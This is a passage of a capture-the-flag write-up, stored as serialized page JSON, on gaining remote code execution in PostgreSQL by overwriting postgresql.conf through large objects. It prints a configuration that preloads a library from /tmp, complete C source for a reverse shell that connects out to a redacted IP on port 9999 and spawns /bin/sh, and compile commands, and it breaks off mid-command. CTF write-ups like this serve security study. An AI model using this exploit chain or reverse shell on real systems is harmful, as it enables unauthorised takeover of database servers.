If you want to see another writeup dealing with PostgreSQL large objects, you can check out another writeup I made on a ",{"type":34,"tag":3659,"props":3660,"children":3664},"a",{"href":3661,"rel":3662},"https://owalid.com/writeups/chatter-box#from-postgresqli-to-rce-unintended",[3663],"nofollow",[3665],{"type":39,"value":3666},"RealWorldCTF 2024 Chatter-box",{"type":39,"value":66},{"type":34,"tag":48,"props":3669,"children":3670},{},[3671],{"type":39,"value":3672},"Basically, with a database account that can use large objects, it is quite simple to achieve RCE only with SELECT clause.",{"type":34,"tag":48,"props":3674,"children":3675},{},[3676,3678,3684,3686,3692,3694,3700],{"type":39,"value":3677},"The PostgreSQL server follows a configuration written in a file called ",{"type":34,"tag":59,"props":3679,"children":3681},{"className":3680},[],[3682],{"type":39,"value":3683},"postgresql.conf",{"type":39,"value":3685}," which is generally located in the Unix user ",{"type":34,"tag":59,"props":3687,"children":3689},{"className":3688},[],[3690],{"type":39,"value":3691},"postgres",{"type":39,"value":3693}," home directory. 
Some configuration entries don't require a server restart for the configuration changes to take effect; it's possible to simply call the ",{"type":34,"tag":59,"props":3695,"children":3697},{"className":3696},[],[3698],{"type":39,"value":3699},"pg_reload_conf()",{"type":39,"value":3701}," function in an SQL query.",{"type":34,"tag":48,"props":3703,"children":3704},{},[3705],{"type":39,"value":3706},"Thanks to large objects, it is then possible to overwrite the configuration file with a configuration that would allow us to achieve RCE.",{"type":34,"tag":48,"props":3708,"children":3709},{},[3710],{"type":39,"value":3711},"Several techniques exist:",{"type":34,"tag":79,"props":3713,"children":3714},{},[3715,3734,3752],{"type":34,"tag":83,"props":3716,"children":3717},{},[3718,3724,3726,3733],{"type":34,"tag":59,"props":3719,"children":3721},{"className":3720},[],[3722],{"type":39,"value":3723},"ssl_passphrase_command",{"type":39,"value":3725}," (by ",{"type":34,"tag":3659,"props":3727,"children":3730},{"href":3728,"rel":3729},"https://pulsesecurity.co.nz/articles/postgres-sqli",[3663],[3731],{"type":39,"value":3732},"Denis 
Andzakovic",{"type":39,"value":177},{"type":34,"tag":83,"props":3735,"children":3736},{},[3737,3743,3744,3751],{"type":34,"tag":59,"props":3738,"children":3740},{"className":3739},[],[3741],{"type":39,"value":3742},"archive_command",{"type":39,"value":3725},{"type":34,"tag":3659,"props":3745,"children":3748},{"href":3746,"rel":3747},"https://thegrayarea.tech/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3",[3663],[3749],{"type":39,"value":3750},"sylsTyping",{"type":39,"value":177},{"type":34,"tag":83,"props":3753,"children":3754},{},[3755,3761,3762,3769],{"type":34,"tag":59,"props":3756,"children":3758},{"className":3757},[],[3759],{"type":39,"value":3760},"session_preload_libraries",{"type":39,"value":3725},{"type":34,"tag":3659,"props":3763,"children":3766},{"href":3764,"rel":3765},"https://adeadfed.com/posts/postgresql-select-only-rce/",[3663],[3767],{"type":39,"value":3768},"adeadfed",{"type":39,"value":177},{"type":34,"tag":48,"props":3771,"children":3772},{},[3773,3775,3780],{"type":39,"value":3774},"At first, I tried to exploit it in the same way as during RealWorldCTF using the ",{"type":34,"tag":59,"props":3776,"children":3778},{"className":3777},[],[3779],{"type":39,"value":3723},{"type":39,"value":3781}," configuration, but the exploit didn't seem to work with the challenge configuration, so I focused on the configuration with the library.",{"type":34,"tag":301,"props":3783,"children":3785},{"lang":3784},"conf",[3786],{"type":34,"tag":306,"props":3787,"children":3790},{"className":3788,"code":3789,"language":3784,"meta":7,"style":7},"language-conf shiki shiki-themes vitesse-dark","# - Shared Library Preloading -\n\nsession_preload_libraries = 'payload.so'\n#shared_preload_libraries = ''      # (change requires restart)\n#jit_provider = 'llvmjit'       # JIT library to use\n\n# - Other Defaults -\n\ndynamic_library_path = '/tmp:$libdir'\n#gin_fuzzy_search_limit = 
0\n",[3791],{"type":34,"tag":59,"props":3792,"children":3793},{"__ignoreMap":7},[3794,3802,3809,3817,3825,3833,3840,3848,3855,3863],{"type":34,"tag":315,"props":3795,"children":3796},{"class":317,"line":318},[3797],{"type":34,"tag":315,"props":3798,"children":3799},{},[3800],{"type":39,"value":3801},"# - Shared Library Preloading -\n",{"type":34,"tag":315,"props":3803,"children":3804},{"class":317,"line":328},[3805],{"type":34,"tag":315,"props":3806,"children":3807},{"emptyLinePlaceholder":545},[3808],{"type":39,"value":548},{"type":34,"tag":315,"props":3810,"children":3811},{"class":317,"line":423},[3812],{"type":34,"tag":315,"props":3813,"children":3814},{},[3815],{"type":39,"value":3816},"session_preload_libraries = 'payload.so'\n",{"type":34,"tag":315,"props":3818,"children":3819},{"class":317,"line":471},[3820],{"type":34,"tag":315,"props":3821,"children":3822},{},[3823],{"type":39,"value":3824},"#shared_preload_libraries = ''      # (change requires restart)\n",{"type":34,"tag":315,"props":3826,"children":3827},{"class":317,"line":485},[3828],{"type":34,"tag":315,"props":3829,"children":3830},{},[3831],{"type":39,"value":3832},"#jit_provider = 'llvmjit'       # JIT library to use\n",{"type":34,"tag":315,"props":3834,"children":3835},{"class":317,"line":541},[3836],{"type":34,"tag":315,"props":3837,"children":3838},{"emptyLinePlaceholder":545},[3839],{"type":39,"value":548},{"type":34,"tag":315,"props":3841,"children":3842},{"class":317,"line":551},[3843],{"type":34,"tag":315,"props":3844,"children":3845},{},[3846],{"type":39,"value":3847},"# - Other Defaults -\n",{"type":34,"tag":315,"props":3849,"children":3850},{"class":317,"line":570},[3851],{"type":34,"tag":315,"props":3852,"children":3853},{"emptyLinePlaceholder":545},[3854],{"type":39,"value":548},{"type":34,"tag":315,"props":3856,"children":3857},{"class":317,"line":578},[3858],{"type":34,"tag":315,"props":3859,"children":3860},{},[3861],{"type":39,"value":3862},"dynamic_library_path = 
'/tmp:$libdir'\n",{"type":34,"tag":315,"props":3864,"children":3865},{"class":317,"line":619},[3866],{"type":34,"tag":315,"props":3867,"children":3868},{},[3869],{"type":39,"value":3870},"#gin_fuzzy_search_limit = 0\n",{"type":34,"tag":48,"props":3872,"children":3873},{},[3874,3876,3882,3884,3890,3892,3898],{"type":39,"value":3875},"Here our final RCE payload will be named ",{"type":34,"tag":59,"props":3877,"children":3879},{"className":3878},[],[3880],{"type":39,"value":3881},"payload.so",{"type":39,"value":3883}," and will be placed in the ",{"type":34,"tag":59,"props":3885,"children":3887},{"className":3886},[],[3888],{"type":39,"value":3889},"/tmp",{"type":39,"value":3891}," directory, which is added to the library search path by the ",{"type":34,"tag":59,"props":3893,"children":3895},{"className":3894},[],[3896],{"type":39,"value":3897},"dynamic_library_path",{"type":39,"value":3899}," entry.",{"type":34,"tag":48,"props":3901,"children":3902},{},[3903],{"type":39,"value":3904},"The code that needs to be compiled is this:",{"type":34,"tag":301,"props":3906,"children":3908},{"lang":3907},"c",[3909],{"type":34,"tag":306,"props":3910,"children":3913},{"className":3911,"code":3912,"language":3907,"meta":7,"style":7},"language-c shiki shiki-themes vitesse-dark","// payload.c\n#include \u003Cstdio.h>\n#include \u003Csys/socket.h>\n#include \u003Csys/types.h>\n#include \u003Cstdlib.h>\n#include \u003Cunistd.h>\n#include \u003Cnetinet/in.h>\n#include \u003Carpa/inet.h>\n#include \"postgres.h\"\n#include \"fmgr.h\"\n\n#ifdef PG_MODULE_MAGIC\nPG_MODULE_MAGIC;\n#endif\n\nvoid _init() {\n    /*\n        code taken from https://www.revshells.com/\n    */\n\n    int port = 9999;\n    struct sockaddr_in revsockaddr;\n\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\n    revsockaddr.sin_family = AF_INET;\n    revsockaddr.sin_port = htons(port);\n    revsockaddr.sin_addr.s_addr = inet_addr(\"[REDACTED]\");\n\n    connect(sockt, (struct sockaddr *) &revsockaddr,\n    sizeof(revsockaddr));\n    
dup2(sockt, 0);\n    dup2(sockt, 1);\n    dup2(sockt, 2);\n\n    char * const argv[] = {\"/bin/sh\", NULL};\n    execve(\"/bin/sh\", argv, NULL);\n}\n",[3914],{"type":34,"tag":59,"props":3915,"children":3916},{"__ignoreMap":7},[3917,3925,3952,3976,4000,4024,4048,4072,4096,4120,4144,4151,4168,4180,4192,4199,4221,4229,4237,4245,4253,4280,4298,4306,4359,4390,4429,4485,4493,4553,4575,4604,4633,4662,4670,4734,4779],{"type":34,"tag":315,"props":3918,"children":3919},{"class":317,"line":318},[3920],{"type":34,"tag":315,"props":3921,"children":3922},{"style":322},[3923],{"type":39,"value":3924},"// payload.c\n",{"type":34,"tag":315,"props":3926,"children":3927},{"class":317,"line":328},[3928,3933,3938,3943,3948],{"type":34,"tag":315,"props":3929,"children":3930},{"style":338},[3931],{"type":39,"value":3932},"#",{"type":34,"tag":315,"props":3934,"children":3935},{"style":475},[3936],{"type":39,"value":3937},"include",{"type":34,"tag":315,"props":3939,"children":3940},{"style":354},[3941],{"type":39,"value":3942}," 
\u003C",{"type":34,"tag":315,"props":3944,"children":3945},{"style":360},[3946],{"type":39,"value":3947},"stdio.h",{"type":34,"tag":315,"props":3949,"children":3950},{"style":354},[3951],{"type":39,"value":909},{"type":34,"tag":315,"props":3953,"children":3954},{"class":317,"line":423},[3955,3959,3963,3967,3972],{"type":34,"tag":315,"props":3956,"children":3957},{"style":338},[3958],{"type":39,"value":3932},{"type":34,"tag":315,"props":3960,"children":3961},{"style":475},[3962],{"type":39,"value":3937},{"type":34,"tag":315,"props":3964,"children":3965},{"style":354},[3966],{"type":39,"value":3942},{"type":34,"tag":315,"props":3968,"children":3969},{"style":360},[3970],{"type":39,"value":3971},"sys/socket.h",{"type":34,"tag":315,"props":3973,"children":3974},{"style":354},[3975],{"type":39,"value":909},{"type":34,"tag":315,"props":3977,"children":3978},{"class":317,"line":471},[3979,3983,3987,3991,3996],{"type":34,"tag":315,"props":3980,"children":3981},{"style":338},[3982],{"type":39,"value":3932},{"type":34,"tag":315,"props":3984,"children":3985},{"style":475},[3986],{"type":39,"value":3937},{"type":34,"tag":315,"props":3988,"children":3989},{"style":354},[3990],{"type":39,"value":3942},{"type":34,"tag":315,"props":3992,"children":3993},{"style":360},[3994],{"type":39,"value":3995},"sys/types.h",{"type":34,"tag":315,"props":3997,"children":3998},{"style":354},[3999],{"type":39,"value":909},{"type":34,"tag":315,"props":4001,"children":4002},{"class":317,"line":485},[4003,4007,4011,4015,4020],{"type":34,"tag":315,"props":4004,"children":4005},{"style":338},[4006],{"type":39,"value":3932},{"type":34,"tag":315,"props":4008,"children":4009},{"style":475},[4010],{"type":39,"value":3937},{"type":34,"tag":315,"props":4012,"children":4013},{"style":354},[4014],{"type":39,"value":3942},{"type":34,"tag":315,"props":4016,"children":4017},{"style":360},[4018],{"type":39,"value":4019},"stdlib.h",{"type":34,"tag":315,"props":4021,"children":4022},{"style":354},[4023],{"type":39,"
value":909},{"type":34,"tag":315,"props":4025,"children":4026},{"class":317,"line":541},[4027,4031,4035,4039,4044],{"type":34,"tag":315,"props":4028,"children":4029},{"style":338},[4030],{"type":39,"value":3932},{"type":34,"tag":315,"props":4032,"children":4033},{"style":475},[4034],{"type":39,"value":3937},{"type":34,"tag":315,"props":4036,"children":4037},{"style":354},[4038],{"type":39,"value":3942},{"type":34,"tag":315,"props":4040,"children":4041},{"style":360},[4042],{"type":39,"value":4043},"unistd.h",{"type":34,"tag":315,"props":4045,"children":4046},{"style":354},[4047],{"type":39,"value":909},{"type":34,"tag":315,"props":4049,"children":4050},{"class":317,"line":551},[4051,4055,4059,4063,4068],{"type":34,"tag":315,"props":4052,"children":4053},{"style":338},[4054],{"type":39,"value":3932},{"type":34,"tag":315,"props":4056,"children":4057},{"style":475},[4058],{"type":39,"value":3937},{"type":34,"tag":315,"props":4060,"children":4061},{"style":354},[4062],{"type":39,"value":3942},{"type":34,"tag":315,"props":4064,"children":4065},{"style":360},[4066],{"type":39,"value":4067},"netinet/in.h",{"type":34,"tag":315,"props":4069,"children":4070},{"style":354},[4071],{"type":39,"value":909},{"type":34,"tag":315,"props":4073,"children":4074},{"class":317,"line":570},[4075,4079,4083,4087,4092],{"type":34,"tag":315,"props":4076,"children":4077},{"style":338},[4078],{"type":39,"value":3932},{"type":34,"tag":315,"props":4080,"children":4081},{"style":475},[4082],{"type":39,"value":3937},{"type":34,"tag":315,"props":4084,"children":4085},{"style":354},[4086],{"type":39,"value":3942},{"type":34,"tag":315,"props":4088,"children":4089},{"style":360},[4090],{"type":39,"value":4091},"arpa/inet.h",{"type":34,"tag":315,"props":4093,"children":4094},{"style":354},[4095],{"type":39,"value":909},{"type":34,"tag":315,"props":4097,"children":4098},{"class":317,"line":578},[4099,4103,4107,4111,4116],{"type":34,"tag":315,"props":4100,"children":4101},{"style":338},[4102],{"type":39,"
value":3932},{"type":34,"tag":315,"props":4104,"children":4105},{"style":475},[4106],{"type":39,"value":3937},{"type":34,"tag":315,"props":4108,"children":4109},{"style":354},[4110],{"type":39,"value":3511},{"type":34,"tag":315,"props":4112,"children":4113},{"style":360},[4114],{"type":39,"value":4115},"postgres.h",{"type":34,"tag":315,"props":4117,"children":4118},{"style":354},[4119],{"type":39,"value":2820},{"type":34,"tag":315,"props":4121,"children":4122},{"class":317,"line":619},[4123,4127,4131,4135,4140],{"type":34,"tag":315,"props":4124,"children":4125},{"style":338},[4126],{"type":39,"value":3932},{"type":34,"tag":315,"props":4128,"children":4129},{"style":475},[4130],{"type":39,"value":3937},{"type":34,"tag":315,"props":4132,"children":4133},{"style":354},[4134],{"type":39,"value":3511},{"type":34,"tag":315,"props":4136,"children":4137},{"style":360},[4138],{"type":39,"value":4139},"fmgr.h",{"type":34,"tag":315,"props":4141,"children":4142},{"style":354},[4143],{"type":39,"value":2820},{"type":34,"tag":315,"props":4145,"children":4146},{"class":317,"line":671},[4147],{"type":34,"tag":315,"props":4148,"children":4149},{"emptyLinePlaceholder":545},[4150],{"type":39,"value":548},{"type":34,"tag":315,"props":4152,"children":4153},{"class":317,"line":680},[4154,4158,4163],{"type":34,"tag":315,"props":4155,"children":4156},{"style":338},[4157],{"type":39,"value":3932},{"type":34,"tag":315,"props":4159,"children":4160},{"style":475},[4161],{"type":39,"value":4162},"ifdef",{"type":34,"tag":315,"props":4164,"children":4165},{"style":343},[4166],{"type":39,"value":4167}," 
PG_MODULE_MAGIC\n",{"type":34,"tag":315,"props":4169,"children":4170},{"class":317,"line":697},[4171,4176],{"type":34,"tag":315,"props":4172,"children":4173},{"style":701},[4174],{"type":39,"value":4175},"PG_MODULE_MAGIC",{"type":34,"tag":315,"props":4177,"children":4178},{"style":338},[4179],{"type":39,"value":468},{"type":34,"tag":315,"props":4181,"children":4182},{"class":317,"line":707},[4183,4187],{"type":34,"tag":315,"props":4184,"children":4185},{"style":338},[4186],{"type":39,"value":3932},{"type":34,"tag":315,"props":4188,"children":4189},{"style":475},[4190],{"type":39,"value":4191},"endif\n",{"type":34,"tag":315,"props":4193,"children":4194},{"class":317,"line":1805},[4195],{"type":34,"tag":315,"props":4196,"children":4197},{"emptyLinePlaceholder":545},[4198],{"type":39,"value":548},{"type":34,"tag":315,"props":4200,"children":4201},{"class":317,"line":1915},[4202,4207,4212,4217],{"type":34,"tag":315,"props":4203,"children":4204},{"style":384},[4205],{"type":39,"value":4206},"void",{"type":34,"tag":315,"props":4208,"children":4209},{"style":343},[4210],{"type":39,"value":4211}," _init",{"type":34,"tag":315,"props":4213,"children":4214},{"style":338},[4215],{"type":39,"value":4216},"()",{"type":34,"tag":315,"props":4218,"children":4219},{"style":338},[4220],{"type":39,"value":420},{"type":34,"tag":315,"props":4222,"children":4223},{"class":317,"line":1932},[4224],{"type":34,"tag":315,"props":4225,"children":4226},{"style":322},[4227],{"type":39,"value":4228},"    /*\n",{"type":34,"tag":315,"props":4230,"children":4231},{"class":317,"line":2029},[4232],{"type":34,"tag":315,"props":4233,"children":4234},{"style":322},[4235],{"type":39,"value":4236},"        code taken from https://www.revshells.com/\n",{"type":34,"tag":315,"props":4238,"children":4239},{"class":317,"line":2037},[4240],{"type":34,"tag":315,"props":4241,"children":4242},{"style":322},[4243],{"type":39,"value":4244},"    
*/\n",{"type":34,"tag":315,"props":4246,"children":4248},{"class":317,"line":4247},20,[4249],{"type":34,"tag":315,"props":4250,"children":4251},{"emptyLinePlaceholder":545},[4252],{"type":39,"value":548},{"type":34,"tag":315,"props":4254,"children":4256},{"class":317,"line":4255},21,[4257,4262,4267,4271,4276],{"type":34,"tag":315,"props":4258,"children":4259},{"style":384},[4260],{"type":39,"value":4261},"    int",{"type":34,"tag":315,"props":4263,"children":4264},{"style":701},[4265],{"type":39,"value":4266}," port ",{"type":34,"tag":315,"props":4268,"children":4269},{"style":338},[4270],{"type":39,"value":803},{"type":34,"tag":315,"props":4272,"children":4273},{"style":1463},[4274],{"type":39,"value":4275}," 9999",{"type":34,"tag":315,"props":4277,"children":4278},{"style":338},[4279],{"type":39,"value":468},{"type":34,"tag":315,"props":4281,"children":4283},{"class":317,"line":4282},22,[4284,4289,4294],{"type":34,"tag":315,"props":4285,"children":4286},{"style":384},[4287],{"type":39,"value":4288},"    struct",{"type":34,"tag":315,"props":4290,"children":4291},{"style":701},[4292],{"type":39,"value":4293}," sockaddr_in revsockaddr",{"type":34,"tag":315,"props":4295,"children":4296},{"style":338},[4297],{"type":39,"value":468},{"type":34,"tag":315,"props":4299,"children":4301},{"class":317,"line":4300},23,[4302],{"type":34,"tag":315,"props":4303,"children":4304},{"emptyLinePlaceholder":545},[4305],{"type":39,"value":548},{"type":34,"tag":315,"props":4307,"children":4309},{"class":317,"line":4308},24,[4310,4314,4319,4323,4328,4332,4337,4341,4346,4350,4355],{"type":34,"tag":315,"props":4311,"children":4312},{"style":384},[4313],{"type":39,"value":4261},{"type":34,"tag":315,"props":4315,"children":4316},{"style":701},[4317],{"type":39,"value":4318}," sockt ",{"type":34,"tag":315,"props":4320,"children":4321},{"style":338},[4322],{"type":39,"value":803},{"type":34,"tag":315,"props":4324,"children":4325},{"style":343},[4326],{"type":39,"value":4327}," 
socket",{"type":34,"tag":315,"props":4329,"children":4330},{"style":338},[4331],{"type":39,"value":351},{"type":34,"tag":315,"props":4333,"children":4334},{"style":701},[4335],{"type":39,"value":4336},"AF_INET",{"type":34,"tag":315,"props":4338,"children":4339},{"style":338},[4340],{"type":39,"value":372},{"type":34,"tag":315,"props":4342,"children":4343},{"style":701},[4344],{"type":39,"value":4345}," SOCK_STREAM",{"type":34,"tag":315,"props":4347,"children":4348},{"style":338},[4349],{"type":39,"value":372},{"type":34,"tag":315,"props":4351,"children":4352},{"style":1463},[4353],{"type":39,"value":4354}," 0",{"type":34,"tag":315,"props":4356,"children":4357},{"style":338},[4358],{"type":39,"value":616},{"type":34,"tag":315,"props":4360,"children":4362},{"class":317,"line":4361},25,[4363,4368,4372,4377,4381,4386],{"type":34,"tag":315,"props":4364,"children":4365},{"style":332},[4366],{"type":39,"value":4367},"    revsockaddr",{"type":34,"tag":315,"props":4369,"children":4370},{"style":338},[4371],{"type":39,"value":66},{"type":34,"tag":315,"props":4373,"children":4374},{"style":332},[4375],{"type":39,"value":4376},"sin_family",{"type":34,"tag":315,"props":4378,"children":4379},{"style":338},[4380],{"type":39,"value":449},{"type":34,"tag":315,"props":4382,"children":4383},{"style":701},[4384],{"type":39,"value":4385}," 
AF_INET",{"type":34,"tag":315,"props":4387,"children":4388},{"style":338},[4389],{"type":39,"value":468},{"type":34,"tag":315,"props":4391,"children":4393},{"class":317,"line":4392},26,[4394,4398,4402,4407,4411,4416,4420,4425],{"type":34,"tag":315,"props":4395,"children":4396},{"style":332},[4397],{"type":39,"value":4367},{"type":34,"tag":315,"props":4399,"children":4400},{"style":338},[4401],{"type":39,"value":66},{"type":34,"tag":315,"props":4403,"children":4404},{"style":332},[4405],{"type":39,"value":4406},"sin_port",{"type":34,"tag":315,"props":4408,"children":4409},{"style":338},[4410],{"type":39,"value":449},{"type":34,"tag":315,"props":4412,"children":4413},{"style":343},[4414],{"type":39,"value":4415}," htons",{"type":34,"tag":315,"props":4417,"children":4418},{"style":338},[4419],{"type":39,"value":351},{"type":34,"tag":315,"props":4421,"children":4422},{"style":701},[4423],{"type":39,"value":4424},"port",{"type":34,"tag":315,"props":4426,"children":4427},{"style":338},[4428],{"type":39,"value":616},{"type":34,"tag":315,"props":4430,"children":4432},{"class":317,"line":4431},27,[4433,4437,4441,4446,4450,4455,4459,4464,4468,4472,4477,4481],{"type":34,"tag":315,"props":4434,"children":4435},{"style":332},[4436],{"type":39,"value":4367},{"type":34,"tag":315,"props":4438,"children":4439},{"style":338},[4440],{"type":39,"value":66},{"type":34,"tag":315,"props":4442,"children":4443},{"style":332},[4444],{"type":39,"value":4445},"sin_addr",{"type":34,"tag":315,"props":4447,"children":4448},{"style":338},[4449],{"type":39,"value":66},{"type":34,"tag":315,"props":4451,"children":4452},{"style":332},[4453],{"type":39,"value":4454},"s_addr",{"type":34,"tag":315,"props":4456,"children":4457},{"style":338},[4458],{"type":39,"value":449},{"type":34,"tag":315,"props":4460,"children":4461},{"style":343},[4462],{"type":39,"value":4463}," 
inet_addr",{"type":34,"tag":315,"props":4465,"children":4466},{"style":338},[4467],{"type":39,"value":351},{"type":34,"tag":315,"props":4469,"children":4470},{"style":354},[4471],{"type":39,"value":357},{"type":34,"tag":315,"props":4473,"children":4474},{"style":360},[4475],{"type":39,"value":4476},"[REDACTED]",{"type":34,"tag":315,"props":4478,"children":4479},{"style":354},[4480],{"type":39,"value":357},{"type":34,"tag":315,"props":4482,"children":4483},{"style":338},[4484],{"type":39,"value":616},{"type":34,"tag":315,"props":4486,"children":4488},{"class":317,"line":4487},28,[4489],{"type":34,"tag":315,"props":4490,"children":4491},{"emptyLinePlaceholder":545},[4492],{"type":39,"value":548},{"type":34,"tag":315,"props":4494,"children":4496},{"class":317,"line":4495},29,[4497,4502,4506,4511,4515,4519,4524,4529,4534,4538,4543,4548],{"type":34,"tag":315,"props":4498,"children":4499},{"style":343},[4500],{"type":39,"value":4501},"    connect",{"type":34,"tag":315,"props":4503,"children":4504},{"style":338},[4505],{"type":39,"value":351},{"type":34,"tag":315,"props":4507,"children":4508},{"style":701},[4509],{"type":39,"value":4510},"sockt",{"type":34,"tag":315,"props":4512,"children":4513},{"style":338},[4514],{"type":39,"value":372},{"type":34,"tag":315,"props":4516,"children":4517},{"style":338},[4518],{"type":39,"value":392},{"type":34,"tag":315,"props":4520,"children":4521},{"style":384},[4522],{"type":39,"value":4523},"struct",{"type":34,"tag":315,"props":4525,"children":4526},{"style":701},[4527],{"type":39,"value":4528}," sockaddr ",{"type":34,"tag":315,"props":4530,"children":4531},{"style":384},[4532],{"type":39,"value":4533},"*",{"type":34,"tag":315,"props":4535,"children":4536},{"style":338},[4537],{"type":39,"value":177},{"type":34,"tag":315,"props":4539,"children":4540},{"style":384},[4541],{"type":39,"value":4542}," 
&",{"type":34,"tag":315,"props":4544,"children":4545},{"style":701},[4546],{"type":39,"value":4547},"revsockaddr",{"type":34,"tag":315,"props":4549,"children":4550},{"style":338},[4551],{"type":39,"value":4552},",\n",{"type":34,"tag":315,"props":4554,"children":4556},{"class":317,"line":4555},30,[4557,4562,4566,4570],{"type":34,"tag":315,"props":4558,"children":4559},{"style":384},[4560],{"type":39,"value":4561},"    sizeof",{"type":34,"tag":315,"props":4563,"children":4564},{"style":338},[4565],{"type":39,"value":351},{"type":34,"tag":315,"props":4567,"children":4568},{"style":701},[4569],{"type":39,"value":4547},{"type":34,"tag":315,"props":4571,"children":4572},{"style":338},[4573],{"type":39,"value":4574},"));\n",{"type":34,"tag":315,"props":4576,"children":4578},{"class":317,"line":4577},31,[4579,4584,4588,4592,4596,4600],{"type":34,"tag":315,"props":4580,"children":4581},{"style":343},[4582],{"type":39,"value":4583},"    dup2",{"type":34,"tag":315,"props":4585,"children":4586},{"style":338},[4587],{"type":39,"value":351},{"type":34,"tag":315,"props":4589,"children":4590},{"style":701},[4591],{"type":39,"value":4510},{"type":34,"tag":315,"props":4593,"children":4594},{"style":338},[4595],{"type":39,"value":372},{"type":34,"tag":315,"props":4597,"children":4598},{"style":1463},[4599],{"type":39,"value":4354},{"type":34,"tag":315,"props":4601,"children":4602},{"style":338},[4603],{"type":39,"value":616},{"type":34,"tag":315,"props":4605,"children":4607},{"class":317,"line":4606},32,[4608,4612,4616,4620,4624,4629],{"type":34,"tag":315,"props":4609,"children":4610},{"style":343},[4611],{"type":39,"value":4583},{"type":34,"tag":315,"props":4613,"children":4614},{"style":338},[4615],{"type":39,"value":351},{"type":34,"tag":315,"props":4617,"children":4618},{"style":701},[4619],{"type":39,"value":4510},{"type":34,"tag":315,"props":4621,"children":4622},{"style":338},[4623],{"type":39,"value":372},{"type":34,"tag":315,"props":4625,"children":4626},{"style":1463},[4627]
,{"type":39,"value":4628}," 1",{"type":34,"tag":315,"props":4630,"children":4631},{"style":338},[4632],{"type":39,"value":616},{"type":34,"tag":315,"props":4634,"children":4636},{"class":317,"line":4635},33,[4637,4641,4645,4649,4653,4658],{"type":34,"tag":315,"props":4638,"children":4639},{"style":343},[4640],{"type":39,"value":4583},{"type":34,"tag":315,"props":4642,"children":4643},{"style":338},[4644],{"type":39,"value":351},{"type":34,"tag":315,"props":4646,"children":4647},{"style":701},[4648],{"type":39,"value":4510},{"type":34,"tag":315,"props":4650,"children":4651},{"style":338},[4652],{"type":39,"value":372},{"type":34,"tag":315,"props":4654,"children":4655},{"style":1463},[4656],{"type":39,"value":4657}," 2",{"type":34,"tag":315,"props":4659,"children":4660},{"style":338},[4661],{"type":39,"value":616},{"type":34,"tag":315,"props":4663,"children":4665},{"class":317,"line":4664},34,[4666],{"type":34,"tag":315,"props":4667,"children":4668},{"emptyLinePlaceholder":545},[4669],{"type":39,"value":548},{"type":34,"tag":315,"props":4671,"children":4673},{"class":317,"line":4672},35,[4674,4679,4684,4689,4694,4699,4703,4707,4711,4716,4720,4724,4729],{"type":34,"tag":315,"props":4675,"children":4676},{"style":384},[4677],{"type":39,"value":4678},"    char",{"type":34,"tag":315,"props":4680,"children":4681},{"style":384},[4682],{"type":39,"value":4683}," *",{"type":34,"tag":315,"props":4685,"children":4686},{"style":384},[4687],{"type":39,"value":4688}," const",{"type":34,"tag":315,"props":4690,"children":4691},{"style":701},[4692],{"type":39,"value":4693}," 
argv",{"type":34,"tag":315,"props":4695,"children":4696},{"style":384},[4697],{"type":39,"value":4698},"[]",{"type":34,"tag":315,"props":4700,"children":4701},{"style":338},[4702],{"type":39,"value":449},{"type":34,"tag":315,"props":4704,"children":4705},{"style":338},[4706],{"type":39,"value":434},{"type":34,"tag":315,"props":4708,"children":4709},{"style":354},[4710],{"type":39,"value":357},{"type":34,"tag":315,"props":4712,"children":4713},{"style":360},[4714],{"type":39,"value":4715},"/bin/sh",{"type":34,"tag":315,"props":4717,"children":4718},{"style":354},[4719],{"type":39,"value":357},{"type":34,"tag":315,"props":4721,"children":4722},{"style":338},[4723],{"type":39,"value":372},{"type":34,"tag":315,"props":4725,"children":4726},{"style":475},[4727],{"type":39,"value":4728}," NULL",{"type":34,"tag":315,"props":4730,"children":4731},{"style":338},[4732],{"type":39,"value":4733},"};\n",{"type":34,"tag":315,"props":4735,"children":4737},{"class":317,"line":4736},36,[4738,4743,4747,4751,4755,4759,4763,4767,4771,4775],{"type":34,"tag":315,"props":4739,"children":4740},{"style":343},[4741],{"type":39,"value":4742},"    
execve",{"type":34,"tag":315,"props":4744,"children":4745},{"style":338},[4746],{"type":39,"value":351},{"type":34,"tag":315,"props":4748,"children":4749},{"style":354},[4750],{"type":39,"value":357},{"type":34,"tag":315,"props":4752,"children":4753},{"style":360},[4754],{"type":39,"value":4715},{"type":34,"tag":315,"props":4756,"children":4757},{"style":354},[4758],{"type":39,"value":357},{"type":34,"tag":315,"props":4760,"children":4761},{"style":338},[4762],{"type":39,"value":372},{"type":34,"tag":315,"props":4764,"children":4765},{"style":701},[4766],{"type":39,"value":4693},{"type":34,"tag":315,"props":4768,"children":4769},{"style":338},[4770],{"type":39,"value":372},{"type":34,"tag":315,"props":4772,"children":4773},{"style":475},[4774],{"type":39,"value":4728},{"type":34,"tag":315,"props":4776,"children":4777},{"style":338},[4778],{"type":39,"value":616},{"type":34,"tag":315,"props":4780,"children":4782},{"class":317,"line":4781},37,[4783],{"type":34,"tag":315,"props":4784,"children":4785},{"style":338},[4786],{"type":39,"value":4787},"}\n",{"type":34,"tag":48,"props":4789,"children":4790},{},[4791,4793,4799],{"type":39,"value":4792},"To compile our library, it's best to be in an environment identical to the challenge, following the same PostgreSQL version, which is the latest (version 17). 
I used Docker to get a clean environment; it's important to install ",{"type":34,"tag":59,"props":4794,"children":4796},{"className":4795},[],[4797],{"type":39,"value":4798},"postgresql-server-dev-17",{"type":39,"value":4800}," which provides the postgres.h header that is essential for compiling our library.",{"type":34,"tag":301,"props":4802,"children":4803},{"lang":3463},[4804],{"type":34,"tag":306,"props":4805,"children":4807},{"className":3467,"code":4806,"language":3463,"meta":7,"style":7},"$> docker pull postgres\n$> docker run -it 76e3e031d245 /bin/bash\n$> apt update && apt install -y posgresql-server-dev-17 gcc vim\n$> gcc \\\n-I$(pg_config --includedir-server) \\\n-shared \\\n-fPIC \\\n-nostartfiles \\\n-o payload.so \\\npayload.c\n$> cat payload.so | base64 -w > payload.b64\n",[4808],{"type":34,"tag":59,"props":4809,"children":4810},{"__ignoreMap":7},[4811,4839,4874,4930,4951,4974,4986,4998,5010,5026,5034],{"type":34,"tag":315,"props":4812,"children":4813},{"class":317,"line":318},[4814,4819,4824,4829,4834],{"type":34,"tag":315,"props":4815,"children":4816},{"style":343},[4817],{"type":39,"value":4818},"$",{"type":34,"tag":315,"props":4820,"children":4821},{"style":701},[4822],{"type":39,"value":4823},"> 